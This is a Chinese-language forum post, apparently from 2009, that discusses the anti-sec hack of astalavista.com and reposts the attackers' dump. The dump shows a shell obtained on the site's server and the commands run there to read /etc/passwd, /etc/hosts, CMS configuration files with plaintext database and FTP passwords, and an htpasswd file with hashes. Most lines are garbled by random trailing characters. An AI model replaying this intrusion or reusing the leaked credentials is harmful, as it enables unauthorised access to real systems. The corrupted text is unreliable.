里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。1 O, M" J3 d* W, `5 h) l% @
: O1 Q% C# T- H/ J! u
[root@front3 ~]# curl -I litespeedtech.com
3 f* W" h! F( O3 h1 `. iHTTP/1.1 200 OK
8 {4 f4 Q0 q, y% A. o4 G. nDate: Fri, 05 Jun 2009 22:54:51 GMT$ k& D8 U. T' C. I
Server: LiteSpeed
- u2 R% B! s! A* @; D6 ]2 N7 x/ N7 X# y
0 {- A- w" Y3 v4 U3 ~另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-/ {4 S. v o' I0 J( v7 U7 v
( I7 v' \0 b S' W+ [
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
* V: g q% I Q" f4 }4 S
2 x3 J( ~$ o& n) I2 q" `" ~3 n" W8 h# o! s6 Q: Y$ u$ u( X$ E
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 7 |3 d* ] a. D5 d$ I# p0 G) h( j
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \/ v5 r" V! }4 L' X0 s: ~4 K# P
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
2 v1 I& o( a% n! E/ Q\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /: L! }3 i7 S0 m" w, c" C) V5 B1 ]
\/ \/ \/ \/ \/ \/ \/
F' a2 G- Z9 M! W The Hacking & Security Community! w7 c0 b( A# |. q& R' U" j3 b
[+] Founded in 1997 by a hacker computer enthusiast5 O" b3 a; r9 z2 h; l0 x
[-] Exposed in 2009 by anti-sec group
4 t) { x6 N/ C* A7 o, P, V9 A- B0 }: D# x- v
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
' P- e) z# p/ L$ r4 z3 n. e7 J- n/ e4 W>> 03. Who’s behind the site?, I2 E# Y8 [( S' f% t
>>
- z+ p4 C( K- f; H' m9 a: v. G>> A team of security and IT professionals, and a countless number of contributors from all over the world.
9 p$ l6 ?$ d* A) D* F, ?9 n W& V, a/ t- T: e, F" U) H
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?% M- Y8 L+ ?; t
>>; I2 j8 z0 W2 k* l4 H/ N. g
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
2 e: t/ H6 c& W$ O4 U, o. U Imilitary institutions.
3 h( H4 i3 U6 h( f>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.8 A. V, T4 R+ T
" |+ ~) b3 k2 J
Why has Astalavista been targeted?7 ]+ h: J7 Q; n" _, ]& h6 ^
% h: \* ^6 K, x1 P; X% nOther than the fact that they are not doing any of this for the “community” but1 v9 _6 m3 v' O( S
for the money, they spread exploits for kids, claim to be a security community, T/ z4 I$ C0 N
(with no real sense of security on their own servers), and they charge you $6.66+ @! ~# ?0 Q$ N/ s
per months to access a dead forum with a directory filled with public releases- d _- A5 l: Z3 Q5 ~8 X
and outdated / broken services." y" x( f, Y( K" [7 M$ ~
" i U l* }8 W/ G5 w+ \We wanted to see how good that “team of security and IT professionals” really is.
1 l. y) @9 @$ ]0 B& y' t5 ^( V0 N
% N* z; B3 t! b8 L) BLet’s begin.
; Y% u* d3 s/ g: i/ N8 C, P1 m) ^4 t7 P" Q' u, D$ K. B
anti-sec:~# ./g0tshell astalavista.com -p 80/ V$ L0 z3 P) A/ A
[+] Connecting to astalavista.com:80
0 @8 Y2 o7 T4 w% [( x[+] Grabbing banner…" I' j7 n! {' N' r# R, l: A
LiteSpeed/ r+ x1 x1 k- i
[+] Injecting shellcode…
3 s# K4 v+ b6 N+ U0 Z[-] Wait for it
( P. S7 S/ j# x- X4 p
9 Z2 G1 N% [5 l" A[~] We g0tshell8 G9 s; |( x5 u$ }
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
# X7 T8 A' P8 x8 z. o) ZID: uid=100(apache) gid=500(apache) groups=500(apache)
% Y3 g' x) S' O& `! k j/ p5 T% I" Y* Q: }8 \3 H5 P
sh-3.2$ cat /etc/passwd
% {9 W9 t4 j3 C5 L) troot:x:0:0:root:/root:/bin/bash
W$ b' T9 b! {* obin:x:1:1:bin:/bin:/sbin/nologin
9 s8 d) J ?' @2 X; `4 |, _. [( W2 m! wdaemon:x:2:2:daemon:/sbin:/sbin/nologin
3 q3 `8 r% v, O; |. n) cadm:x:3:4:adm:/var/adm:/sbin/nologin; ]2 \: \ v" d$ Y
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin; ~# Z9 i. j5 r" }3 z1 ~* o: s4 J
sync:x:5:0:sync:/sbin:/bin/sync
$ j8 T6 Y/ i) ~8 Rshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown. s5 q _0 E2 p2 |- c# n4 r+ Y2 O3 X
halt:x:7:0:halt:/sbin:/sbin/halt5 Q0 ^' [* O* p. p/ f
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin3 i. s- I N' [6 h# _# m- @
news:x:9:13:news:/etc/news:' b7 r# ^: b a- y. d( o1 v
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
5 Y. t$ y7 N4 N! b: S! o, r& yoperator:x:11:0 perator:/root:/sbin/nologin
: N8 E' n# `2 kgames:x:12:100:games:/usr/games:/sbin/nologin
; h3 |! d# u7 Hgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
7 V5 i/ K" M" I+ Z3 _' {. Y9 Bftp:x:14:50:FTP User:/var/ftp:/sbin/nologin( Q0 I/ w# z" e- h. u$ w5 e
nobody:x:99:99:Nobody:/:/sbin/nologin
. H. [% I ^/ {4 krpm:x:37:37::/var/lib/rpm:/sbin/nologin
' u5 j: [5 G t* n) T: _$ U2 Ddbus:x:81:81:System message bus:/:/sbin/nologin( i1 m. Y7 u" X
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin P% b# ]! \6 l1 ^2 ~
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
) ^; Z. P1 Q; O5 G2 Fsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin- \2 I9 d9 ?! U, |
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
6 @3 y, W- C: o# q. t9 V& |haldaemon:x:68:68:HAL daemon:/:/sbin/nologin X$ @% p1 |7 [2 j5 C' y" O! X6 [ I
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
" ~4 y9 E6 d3 ^# l+ ~0 b3 F. H! l$ nrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
; E& S' A7 D9 Fnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin8 W7 q0 N" D) j
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
1 h5 n3 @% y0 B4 qpcap:x:77:77::/var/arpwatch:/sbin/nologin
/ d& R( s% B4 s5 [7 Onamed:x:25:25:Named:/var/named:/sbin/nologin
7 _% m" W% u/ x. ]6 A5 x7 o& [# Tapache:x:100:500::/var/www:/bin/false: F; I3 _1 A) x3 @' s) j& X* ]
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
: F( B# r! g* ~3 Z& y# W! V( pmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash, h+ b9 Y6 J7 q$ w
webapps:x:500:501::/var/www/html:/bin/bash) J3 O' M5 E+ ]. j) Q2 r$ [
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
; K, f0 Y. Y# _3 s. C2 P+ v7 qadmin:x:501:502::/home/admin:/bin/bash; ?9 g; ~8 t3 o: T
jon:x:502:503::/home/jon:/bin/bash
6 {% _: Z7 j# {2 Z" p5 Scom:x:503:504::/home/com:/bin/bash
& A( l1 O+ }. Z4 entp:x:38:38::/etc/ntp:/sbin/nologin
; ?$ f! S; W. s! s2 W# h' N# K2 Qais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
0 S7 m+ d+ r7 y h0 aastanet:x:504:505::/home/astanet:/bin/bash7 q- ~5 K: h* k; Q! g$ u6 L
avahi:x:70:70:Avahi daemon:/:/sbin/nologin/ D4 Q$ f, A+ f, Y
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
/ B A% I. M7 x& f4 @
4 b: c: H6 I+ Ush-3.2$ cat /etc/hosts/ X6 x7 @( } |0 B
# Do not remove the following line, or various programs, K0 f% M1 y4 D# B9 c# ? q3 s% ^
# that require network functionality will fail.
- [9 ]* W' @" a127.0.0.1 localhost.localdomain localhost5 N1 w, Q+ }. ]% z ~
::1 localhost6.localdomain6 localhost6
+ W- V; S8 C4 L" o80.74.154.172 asta1.astalavistaserver.com
' \, g+ Y' n- h* O. O; ]. Y
4 a( U- h( R, O- F3 @! b4 ]8 {sh-3.2$ pwd
! J; l, N6 T" V/home/com/public_html# c& b' t6 u4 O# S# @- F
5 B) x- V }0 M7 N' }
sh-3.2$ ls -la
) k2 a1 ?3 V# v4 t5 G$ Dtotal 18460
# J# X& m4 k' G. V& }( T; Bdrwxr-xr-x 30 com apache 4096 May 28 17:06 .; L: H( f! p6 c6 a: _5 F m
drwx–x–x 11 com com 4096 Jun 25 2008 ..
; D" P3 t3 w- E7 H; [& r) odrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
9 e* |9 S; P4 }* {0 Ydrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
6 r# e- t5 W2 i( f/ \drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
4 I' C" D, b8 k3 W; qdrwxrwxrwx 2 com com 4096 May 19 00:50 config( G9 y$ N! g" ?7 k" q. k
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core7 B- @5 }6 V6 E2 Q
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
1 ]0 X* }* _/ S# ?8 u6 K4 Ldrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
- g& e% b( M1 P: _$ ~7 \drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo( K5 v0 ~3 `3 |& P/ G
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
& }+ s/ j- m, A) X3 p( _-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php6 a* }% J0 ]; x/ @
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
- a$ Z1 N4 A& Kdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
v4 G9 A M6 `) a& X1 i. ~/ b-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
7 g4 D" V5 h: Q Mdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
; h( G3 T0 z: l A( [-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess4 _4 g4 j7 }) X8 z+ v; E
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
7 N# ]: S- ]5 N. O& I% k-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak, w4 L* M4 A% m8 {/ y
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool) h1 M+ b; g' m q) |0 M% D
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
! Q+ v- h4 p, A1 f+ ^8 A( y-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
' J+ P9 z- |( M jdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer" n O+ P$ F# R2 m) Z" K% J
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
: c& ~" w( y* c, Q! P0 Y4 c" `drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib- o% n& S/ c- j& N0 C; J3 Y7 f
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
9 ?# S4 o: X) i0 w. hdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
' o( @; F* Y2 r4 d9 `drwxr-xr-x 34 com com 4096 May 28 16:30 modules
& l' L/ X/ r6 t6 Q& q" adrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin$ ~% j+ W! r- r U5 J4 P, C
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
# O, s* Z z1 F; w' s6 c8 tdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
$ z2 }. Z* ]; K; j$ t3 gdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy6 `: Y2 b: u7 b9 h
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
; a6 {5 |9 L5 `, T-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt2 H; k/ {( |" v5 u8 t8 j4 d
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml6 L+ p) g9 q# D
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
6 s1 g3 e. y; P- ^" Y' ndrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
/ e3 B" ~' J% _6 ~3 Zdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp/ W1 O5 N! Y9 H& j- T3 m8 U+ g* l" g- s
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
& @" N' k3 v8 r; h4 v2 l9 W
, w6 s$ H# ^1 M& G; ~& gsh-3.2$ head -20 index.php
% [% O7 D/ y1 A( C4 v$ K- }<?php. N( \3 s+ R% C o, q# ^6 G
], {2 Y; q" W1 P/**
3 O0 ]. J3 X* h' v9 g8 g; ~* The main page for the CMS
2 s" m( N7 V% c4 r3 w& Q8 c* @copyright CONTREXX CMS - COMVATION AG
# u; e) w/ p) Z5 e5 B9 c- S* @author Comvation Development Team
; T; h# f0 d" F: j$ s1 [* @version v1.0.9.10.1 stable$ z/ U" V0 S: Z# \" V' u, H+ j
* @package contrexx$ g: b0 l1 h& r% F N8 A( X
* @subpackage core: j9 J l/ K" H+ c4 a
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage( P, ?6 ]0 f2 A. }
* @since v0.0.0.0" y K5 U# K/ c2 W& w, a" E, W1 e
* @todo Capitalize all class names in project
7 b' n" F. c" p ^! ~6 Z8 D* @uses /config/configuration.php
# r. C4 {3 f1 K* @uses /config/settings.php( i; D% X" Y3 ^6 e& ]" v: m
* @uses /config/version.php
+ g+ Z2 D N5 }8 m- q4 H" L* @uses /core/API.php2 n6 ]+ e& n. P: F0 H2 I
* @uses /core_modules/cache/index.class.php
" h5 _; E( ~, @4 `+ I \* @uses /core/error.class.php+ v2 p# y7 v/ W3 t
* @uses /core_modules/banner/index.class.php3 u' A6 A2 V/ g8 q: c6 x
* @uses /core_modules/contact/index.class.php# I4 [; U. g% o) |8 \$ s
; ]5 v( ]! g, s. g
sh-3.2$ cd config/
' t. }# S: q4 B# @1 Fsh-3.2$ ls -la9 J* L9 w( z& c& R9 \
total 32
: P* l; K1 u* J$ ?drwxrwxrwx 2 com com 4096 May 19 00:50 .
! s) \, e5 [" Q7 m, [) \, d3 xdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
. K' H7 @( t$ h-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php o+ k7 P5 w5 n1 G) \, s, o8 R
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php/ X' T# @ e% k) X1 a# Q) e* s
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
* V) p/ W* O& r6 n. Q K-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php" F, _* N- C* ^1 I6 g9 h% U
' k8 ^! \) p3 a3 P' x5 q
sh-3.2$ cat configuration.php
0 _4 x* n, y8 `4 R1 Q+ J6 S[snip], Y- ?+ h" i9 `$ E1 ?3 X
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost4 f0 M, s1 y6 h1 _4 a! W- q2 L
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
: ]" q: ^6 P O& |3 W# `$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix% v- H. m0 q `
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
% N$ p: g% D, T. l2 w5 H- o9 ]$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
7 V* u& @+ q0 A1 ^- s" h8 Q' ?$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)3 A4 u W/ D! L0 W; Q5 l
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
* n. P Y( X; _[snip]
8 y- a$ w6 y; v( O2 k$_FTPCONFIG['is_activated'] = true; // Ftp support true or false4 W2 S7 ?7 \9 v* `7 `5 `3 v
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode5 o1 a, O3 z, R0 `
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
0 p; @& `( \+ H- W% Y$_FTPCONFIG['port'] = 21; // Ftp remote port
& ?( H6 g+ ~" o. o. n$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
) N# h) R7 O% a$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
; v" C E* j. B m# H- l5 D9 n1 e/ D$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms( S2 t; o( k, f% i$ {! R- H
: ]& J, Y( r6 O; ^5 y! K' y) S! I
sh-3.2$ cd ..
% {: [$ b& a$ q& ksh-3.2$ cd dvd/
( I4 o$ u0 k! j' e2 `3 p: Msh-3.2$ ls -la
! y5 @* o) t+ l0 V/ }total 2913780 G4 Q9 r; T- }9 y& q
drwxr-xr-x 2 com com 4096 Sep 9 2008 .: g( d7 y2 O5 {3 `
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
3 T# z) @/ _/ W* O" t7 `0 U-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar% q9 s! T$ {- D
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
: _3 W. e: M7 {6 ^6 K0 t-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
. l5 j( Y0 T! T5 x% c-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess3 U& Z( V2 |& }& @2 t) n1 M
: p- z9 a% p& h/ w- |7 r
sh-3.2$ cat .htaccess! r7 |8 }) H/ j' n3 N! s
authType Basic; w3 l! C, Y' W! r. c- [3 g8 ~
authName DVD
" D# a) t: D1 g; h: CauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd/ j0 o0 B) z" a% y( |
require valid-user
& A* M& m+ T4 O0 E, E! r- v
+ l( _' G0 M7 rsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
6 _6 C W6 O2 V/ B% h, vDVDdownload:CRD8cuY6.MPT6
" c+ \6 M j8 C+ G K' k4 tDVDdownload2:CR8a36.wluFMg" Q; K9 S% w, f
* t3 Z( R3 g3 f2 F6 \sh-3.2$ cat test.php0 ~9 b1 B1 y4 @0 ~3 R3 q1 q9 f5 H
<?php3 B+ g9 q0 c2 b) c Q S
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
5 A( N3 Q$ G$ m2 T o$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));8 j& g0 Y" B& i
echo $url;* E1 W- ^7 o% b/ s* C2 j% g9 Y9 i
?>
7 o" N2 i2 U6 m& G( z1 A
4 w$ |8 c9 _1 m g3 csh-3.2$ cd modifications/
9 L2 E) `2 }6 wsh-3.2$ ls -la
: j' R" d8 ^5 ]" F; Utotal 32
% Y1 v4 d9 y6 }8 N, _. F0 `drwxr-xr-x 8 com com 4096 May 11 12:48 .
0 d7 X8 z# F5 s, Tdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..3 z5 D' O% `8 V& Q# j# N4 r% C/ v
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng( W- x) h! n- ^: Y" K
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs7 z2 g! H1 U8 g5 G: \
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools% v, B. \: T( G) n1 K8 O' f
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
7 Z6 X/ s1 {% B7 O0 A+ g& g$ F3 wdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search+ o0 S! @ p2 i' l0 k
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
( v( c+ |$ J; R* M8 n7 Q
# }' O: c/ k% _$ Lsh-3.2$ ls -R! ~. U: p6 H- H* z" G/ s, r
.:7 P* k2 I' p" p. Q% `: O. M. Y
com_avtng cronjobs onlinetools pjirc search _tmp
% M, a2 K$ Y* M% u1 N3 n _# Y+ ]
+ ~( C0 H) M0 X$ M k6 V./com_avtng:2 _0 F0 _& o+ A" i4 M$ c& t
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
1 \3 _# E$ w( w1 o/ e
4 d$ {# i$ O/ [+ w, ]6 i./com_avtng/scripts:" |* }: o ~% M$ b2 p. R
popunder.js
- }# ]- t9 g4 A! j& Y% O0 a" ]5 F) T3 J: ]3 _: r5 D
./cronjobs:/ p3 z0 _+ w5 p
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
# R( }3 j7 O6 {5 W7 {; a: G" L' b$ s) G
./cronjobs/tmp:7 _5 B) G) w3 l0 S; a. P
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
( J6 `7 S, r% K# P Q7 |& Z: F, T7 P, I m
./onlinetools:
8 V9 a9 O% g9 sindex.php0 J3 E% C7 S+ @
" i1 e( j6 U9 w8 H2 V$ @2 N! I& h( z
./pjirc:2 _$ a! ^" I+ d v( W
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt8 @1 n4 Y: X! V# O
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt! w: y5 r3 e1 F2 {( _& a% x
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd/ X( E/ W# t( F* k
9 u2 Y' i* z$ U" ?" _& Z$ b./pjirc/img:% J- H9 B( J$ W: s5 \! z0 n
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif g& o. K" X! k! j
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
9 n$ C# D) F# Averre-eau.gif
9 w7 j# A0 U$ J( f# w0 d/ }argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
1 g# ?. W6 o5 yverre-vin.gif7 c. v* M: a3 I# |4 G, {' ?$ \
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif5 \, `) H; ?) N: m
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif+ x9 x) A0 P0 k2 W7 i( ?
7 A6 n& L& k& J./pjirc/snd:. A) c* c X+ f) D' p
bell2.au ding.au2 _8 [5 O( ?8 s* ]. z
2 `% q/ Z' S5 _: v
./search:
- g" | i# {% X! H/ @3 @7 RsearchEngines.php search.php
9 R% X6 g! ]9 Q. Y4 Z0 M. {
$ Z' Y% ^' B; u9 h6 i9 e./_tmp:
% z/ H) W# h1 E' \* w. h8 ldefaultPorts.php defaultPorts.txt
& i- e1 k C. V# \; p( G8 y% o9 M, U) F4 G$ H9 [8 n6 y7 p% D
sh-3.2$ cd cronjobs/
5 {# G1 h, N4 L6 {+ Lsh-3.2$ cat exploits.php
+ J" ]5 B( s7 U4 \" ~9 @[snip]
8 w) C! Q7 n- a% f: G) n. v$categories = array();
. r5 D: e, G% W$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;3 ^* {3 S8 ]: f2 N8 ]9 c
$expolits = file($milw0rmFile);3 P" d5 n4 k: a' X8 F0 q
$comExploits = array();/ {/ Q4 d3 ?! ]- G7 g; v8 r. R
[snip]
: x! W4 `! B$ c$ ?; U// manage data& r. X$ R7 f4 q' f
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640* C1 H% K! I. i. e/ i
Q5 K8 J; E' n" p // get path and title
% b/ b% V6 s+ m% ]8 a- k4 J# R $expolits[$x] = trim($expolits[$x]);
6 Y, Q1 D* r- l9 [ X; F $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
# ~ @. U: N0 y$ o; ? $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
8 m% `4 ]. }: b" K4 x9 c& |7 F0 r% B ?* Q( s% E- c- d
// check if file exists
4 b4 P% h' ]& C5 F4 _% @ if (file_exists($path)) {% q$ g8 B/ i& G
% L ^; \' c9 L1 w
$text = file_get_contents($path);
# j$ x- F- c e4 M$ M# w; G: u, d: c8 p, m, ~
// get content and date
6 k" _5 F: l/ z. J //$text = htmlspecialchars($text, ENT_QUOTES);
3 r# _0 ]6 q6 t5 x' Q% x v8 F4 L $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
& w1 P3 z# j1 Q6 B! e5 a if ($tmptext != ”) {
, k5 g1 @6 [. S1 ]) ` $text = $tmptext;
4 ~+ A5 V) P ^ } else {1 L$ ^; Y% t. ?1 ?8 H2 L9 p3 H
$text = addslashes(htmlentities($text, ENT_QUOTES));
: L" S# P" J8 y2 V }. G- u, f# P/ K* ?% `7 j" G9 s2 u
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
: K) s! r* i! I" s3 J $tmp = explode('-', $date);% ~5 D/ ]& J: w8 _* ?
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));! r. H/ w+ b0 e& i+ T
$cat = getCategory ($path);0 H: ~( U8 ?& C* I
$ext = pathinfo(basename($path));
4 u- O: J9 v2 U% p" T) v8 n6 N% M# E' P $ext = $ext['extension'];, m. z6 H" b0 D( Y. a3 C
$qStr = ”6 a |: S$ I: |2 g v" W) a
SELECT `id`
, n* C3 }2 N3 T& ?/ U FROM `contrexx_module_exploits`
0 ] e5 {. p+ _" d3 ], R WHERE `title` = ‘” . $title . “‘
X3 M; m; D) h+ P" U AND `date` = ‘” . $date . “‘2 B5 F$ u! g% U1 A3 v6 O. S
“;6 z, S4 z( h$ t( _: x
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;( y. t3 g! B# ], }3 l5 n( K
$q = $_objDB->query($qStr);, V) A0 k/ H G4 Q
! G9 @; p7 M0 p( ] if ($q->numRows() == 0) {" u4 H. [/ ^; V
' [9 a% o K9 s: q X) l
// prepare array
/ j6 Q* Q& P+ C+ b $comExploits[$x]['date'] = $date;
6 I. ^; H5 q# d, F" N- D $comExploits[$x]['title'] = $title;& u6 @' |7 o' @' } ]$ D
$comExploits[$x]['author'] = ‘milw0rm’;' l4 J( d& p) `# N# E0 d* @5 C, g' K
$comExploits[$x]['text'] = $text;
/ R' K: X8 Z3 q" P: ~" E( o $comExploits[$x]['source'] = $ext;. }. [7 V. B4 m5 C7 V/ z8 I
$comExploits[$x]['url1'] = ”;& n( S6 q/ B! e- h. t+ F
$comExploits[$x]['url2'] = ”;! I3 O1 W4 T3 u8 X& J F2 N5 k
$comExploits[$x]['catid'] = $cat;- J7 R5 I3 z7 P7 k0 B
$comExploits[$x]['lang'] = ‘2′;
* \5 {# s4 O" L) \# I2 T; d $comExploits[$x]['userid'] = ‘12′;
- V5 M% l' J" Z4 B" d( _ $comExploits[$x]['startdate'] = ‘0000-00-00′;
l7 ]5 t$ Z1 K8 {4 Z. c! g" w $comExploits[$x]['enddate'] = ‘0000-00-00′;
9 I$ I. m' U' s0 Z. u) X/ i $comExploits[$x]['status'] = ‘1′;. o( g/ H" q7 V8 j, ^- H, x
$comExploits[$x]['changelog'] = $date;
/ w% o: F- a9 D$ n& E2 @
+ \7 r8 j# o( m# i }% V1 S; V/ s; s+ |& H
[snip]
) [7 D) x2 y. { T $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>$ c+ a- \# O- V( Y
<rss version=”2.0″>1 K2 U! B2 M4 o* F N
<channel>
2 |/ p$ t9 x5 i6 O <title>ASTALAVISTA.com - Exploits</title>& l6 m. R" ?5 g" `1 P" I
